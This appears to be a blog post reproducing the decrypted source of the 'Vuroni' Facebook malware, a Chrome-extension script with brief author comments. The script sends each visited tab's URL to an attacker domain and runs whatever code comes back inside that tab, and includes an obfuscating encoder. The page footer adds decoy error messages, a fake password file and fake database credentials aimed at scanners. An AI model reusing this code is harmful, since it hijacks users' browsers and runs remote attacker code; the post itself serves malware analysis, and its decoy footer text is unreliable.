Source Vuroni FB virus

Leave a Comment
Decrypted script:
http://pastebin.com/NrjeAkP2


/*
Script File : 639040963078.mp3
@cre : midz
*/

var Time = "Now";
var vDate = "Date";
var vRealTime = window[vDate][Time]();
var vTimeCond = 1447161025000; // -> Time Condition : Mon, 15 Sep 47828 21:36:40 GMT, i convert Unix timestamp to RealTime but it so large O.o.

//1447619173 <~ i convert today to Unix TimeStamp for checking condition below.

if(vRealTime >= vTimeCond){ // ??Dafuq....
  var unkVal = "tabs";
  var onUpdateEvent = "onUpdated";
  var addListEvent = "addListener";
  var vmethod = "get";
  var valURL = "url";
  var compStatus = "complete";
  var status = "status";
  var method = "GET";
  var statusRET = "onreadystatechange";
  var command = "executeScript";
  var id = "id";
  var resText = "responseText";
  var resState = "readyState";
  var URL = "http://vuronibugun.xyz/z.php?url=";
  var browser = "chrome";
  var fOpen = "open";
  var fSend = "send";
}

window[browser][unkVal][onUpdateEvent][addListEvent](function(valParm1){
  window[browser][unkVal][vmethod](valParm1,function(valParm){
    if(valParm[status] == compStatus){
      var xmlhttpReq = new XMLHttpRequest();
        xmlhttpReq[fOpen](method, URL+valParm[valURL], true);
        xmlhttpReq[statusRET] = function() {
          if(xmlhttpReq[resState] == 4 && xmlhttpReq[status] == 200){
            window[browser][unkVal][command](valParm[id],{code:xmlhttpReq[resText]});
          }
        }
        xmlhttpReq[fSend]();
    }
  })
})

function encodeString(parameter){
  var val1 = "ABCDEFGHIJKLMNOPRSTUVYZXabcdefghijklmnoprstuvyzx0123456789";
  var val2 = ["6OCd7A3sm54MfY8LiuKEGRazgcN9nZvyPUVSBD0bFTlhrIJjHo1xep2kXt","BcjMOU3pyeTsHmrZdKG0DFL6PahNAXv2z4E8tu7RVixn19SbYCoJkflI5g","kTuG9pHxSZ0U4ehBm3cy2gtdCOzlr5fKFJ1nREDiLXsAo8V7vNMYPjb6Ia","Hm85bFzpadAn7x2CP0K69sOL43iUETogvMBujVfZychGXlerS1YItRkDJN","ZGszBRS2u5fN4MeV7DCTbcd6g90tAhjYiFamxXHJEnvO1r8LpklIK3yUPo","VmCh9pJe8dInMPTyK2goc5L4bZAaDuRliGEzr7XO3kUF06vNSftHYjxBs1"];
  var str = "";
  for(i=0;i    if(val1.indexOf(parameter[i]) >= 0){
      str += val1[val2[i % val2.length].indexOf(parameter[i])];
    }else{
      str += parameter[i];
    }
  }
  return str;
}

0 comments:

Post a Comment

Powered by Blogger.
Warning: include(4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3

Microsoft SQL Native Client error '80040e14
Unclosed quotation mark after the character string
Query failed: ERROR: syntax error at or near \"'\" at character 56 in home/www/regs/home.php on line 121.
SQLSTATE: 42000 (ER_SYNTAX_ERROR) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use
ORACLE-00933: SQL command not properly ended
function antiscanner($antiscanner)
{
return \$antiscanner;
}
\"/usr/local/bin\"
\"c:/www/regs/home\"
define( 'DB_NAME', 'database' );
define( 'DB_USER', 'www.localhost.com' );
define( 'DB_PASSWORD', 'antiscanner' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc:bin:!:2:2::/bin:sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm:uucp:!:5:5::/usr/lib/uucp: guest:!:100:100::/home/guest:
SomeCustomInjectedHeader:injected_by_wvs
PROJECTS
Raven
DevAssistant
Pascal Trainer
Meow encoder 0.2
PROJECT LIST
TOOLS
Hacking
Forensic
Developer tools
Reverse engineering
APP LIST
DOCUMENTS
Hacking
Metasploit
Coding
Web development
SOURCE CODE
C#, VB.NET C++ Delphi VB6
Python PHP Perl Bash Batch
HTML, CSS, Javascript
Autoit AHK